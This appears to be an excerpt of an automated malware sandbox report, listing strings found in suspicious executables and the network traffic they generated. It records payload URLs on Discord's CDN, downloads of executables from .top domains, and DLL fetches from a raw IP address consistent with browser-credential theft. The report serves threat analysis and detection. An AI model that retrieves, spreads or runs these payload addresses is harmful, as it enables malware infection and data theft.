Source: D8D0.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: CD17.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: D8D0.exe.10.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: CD17.exe.10.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DF3A.exe.10.dr	String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: D8D0.exe.10.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: sqlite3.dll.35.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://accounts.google.com
Source: craw_window.js.34.dr	String found in binary or memory: https://accounts.google.com/MergeSession
Source: B096.exe, 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, aspnet_state.exe, 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, DF3A.exe, 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, ServiceModelReg.exe, 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://apis.google.com
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com
Source: B096.exe	String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: DF3A.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: DF3A.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: D8D0.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
Source: BBE1.exe, 0000001B.00000000.422812164.0000000000792000.00000002.00020000.sdmp, BBE1.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
Source: B096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
Source: FD36.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpg
Source: DEDC.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg
Source: DEDC.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg
Source: DEDC.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg
Source: DEDC.exe.10.dr	String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://clients2.google.com
Source: manifest.json.34.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://clients2.googleusercontent.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr	String found in binary or memory: https://content-autofill.googleapis.com
Source: Reporting and NEL.36.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external
Source: f3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp.36.dr, f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://dns.google
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://fonts.googleapis.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://fonts.gstatic.com
Source: craw_window.js.34.dr, craw_background.js.34.dr	String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: Network Action Predictor.34.dr	String found in binary or memory: https://js.monitor.azure.com/
Source: Reporting and NEL.36.dr	String found in binary or memory: https://mdec.nelreports.net/api/report?cat=mdocs
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://ogs.google.com
Source: craw_window.js.34.dr, manifest.json.34.dr	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://play.google.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr	String found in binary or memory: https://r4---sn-4g5e6nss.gvt1.com
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr	String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.34.dr, manifest.json.34.dr	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: CD17.exe.10.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.34.dr, craw_background.js.34.dr	String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: D8D0.exe.10.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://www.google.com
Source: manifest.json.34.dr	String found in binary or memory: https://www.google.com/
Source: craw_window.js.34.dr	String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: craw_window.js.34.dr	String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.34.dr	String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.34.dr	String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.34.dr	String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, craw_window.js.34.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr, craw_background.js.34.dr	String found in binary or memory: https://www.googleapis.com
Source: manifest.json.34.dr	String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.34.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.34.dr	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.34.dr	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.34.dr	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.dr	String found in binary or memory: https://www.gstatic.com

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: xacokuo8.top

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic	HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic	HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic	HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic	HTTP traffic detected: GET //l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 65.108.80.190Connection: Keep-Alive

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49680
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49678
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
